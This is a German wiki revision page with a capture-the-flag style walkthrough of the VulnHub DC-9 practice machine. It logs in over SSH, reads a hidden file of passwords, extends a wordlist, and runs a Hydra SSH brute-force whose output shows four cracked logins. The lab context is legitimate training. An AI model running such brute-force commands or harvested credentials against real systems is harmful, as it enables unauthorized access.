Vulnhub dc-9 Einloggen und gucken: Unterschied zwischen den Versionen

Aus Xinux Wiki
Zur Navigation springen Zur Suche springen
Zeile 53: Zeile 53:
 
  '''B4-Tru3-001'''
 
  '''B4-Tru3-001'''
 
  '''4uGU5T-NiGHts'''
 
  '''4uGU5T-NiGHts'''
 +
=Erneuter Test=
 +
*hydra -L users.txt -P pass.txt 10.0.10.58 ssh                                                                                                                        130 ⨯
 +
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these ***
 +
ignore laws and ethics anyway).
 +
 +
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-03-09 11:23:03
 +
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
 +
[DATA] max 16 tasks per 1 server, overall 16 tasks, 551 login tries (l:19/p:29), ~35 tries per task
 +
[DATA] attacking ssh://10.0.10.58:22/
 +
[22][ssh] host: 10.0.10.58  login: '''fredf  password: B4-Tru3-001'''
 +
[22][ssh] host: 10.0.10.58  login: chandlerb  password: UrAG0D!
 +
[22][ssh] host: 10.0.10.58  login: joeyt  password: Passw0rd
 +
[22][ssh] host: 10.0.10.58  login: janitor  password: Ilovepeepee
 +
1 of 1 target successfully completed, 4 valid passwords found
 +
[WARNING] Writing restore file because 2 final worker threads did not complete until end.
 +
[ERROR] 2 targets did not resolve or could not be connected
 +
[ERROR] 0 target did not complete
 +
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-03-09 11:24:56
  
 
=welche Kernelversion läuft?=
 
=welche Kernelversion läuft?=
 
*uname -a
 
*uname -a
 
  Linux dc-9 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u2 (2019-11-11) x86_64 GNU/Linux
 
  Linux dc-9 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u2 (2019-11-11) x86_64 GNU/Linux

Version vom 9. März 2023, 10:25 Uhr

Einloggen

  • ssh janitor@10.0.10.58 255 ⨯
janitor@10.0.10.58's password: 
Linux dc-9 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u2 (2019-11-11) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Mar  9 19:57:31 2023 from 10.0.10.101
  • ls -la
total 16
drwx------  4 janitor janitor 4096 Mar  9 19:57 .
drwxr-xr-x 19 root    root    4096 Dec 29  2019 ..
lrwxrwxrwx  1 janitor janitor    9 Dec 29  2019 .bash_history -> /dev/null
drwx------  3 janitor janitor 4096 Mar  9 19:57 .gnupg
drwx------  2 janitor janitor 4096 Dec 29  2019 .secrets-for-putin

Was ist in diesem Verzeichnis?

cat .secrets-for-putin/passwords-found-on-post-it-notes.txt 

BamBam01
Passw0rd
smellycats
P0Lic#10-4
B4-Tru3-001
4uGU5T-NiGHts

Wir erweiteren unsere pass.txt

password
3kfs86sfd
468sfdfsd2
4sfd87sfd1
RocksOff
TC&TheBoyz
B8m#48sd
Pebbles
BamBam01
UrAG0D!
Passw0rd
yN72#dsd
ILoveRachel
3248dsds7s
smellycats
YR3BVxxxw87
Ilovepeepee
Hawaii-Five-0
BamBam01
Passw0rd
smellycats
P0Lic#10-4
B4-Tru3-001
4uGU5T-NiGHts

Erneuter Test

  • hydra -L users.txt -P pass.txt 10.0.10.58 ssh 130 ⨯
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** 
ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-03-09 11:23:03
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 551 login tries (l:19/p:29), ~35 tries per task
[DATA] attacking ssh://10.0.10.58:22/
[22][ssh] host: 10.0.10.58   login: fredf   password: B4-Tru3-001
[22][ssh] host: 10.0.10.58   login: chandlerb   password: UrAG0D!
[22][ssh] host: 10.0.10.58   login: joeyt   password: Passw0rd
[22][ssh] host: 10.0.10.58   login: janitor   password: Ilovepeepee
1 of 1 target successfully completed, 4 valid passwords found
[WARNING] Writing restore file because 2 final worker threads did not complete until end.
[ERROR] 2 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-03-09 11:24:56

welche Kernelversion läuft?

  • uname -a
Linux dc-9 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u2 (2019-11-11) x86_64 GNU/Linux
Abgerufen von „http://wiki.ixheim.de/index.php?title=Vulnhub_dc-9_Einloggen_und_gucken&oldid=43051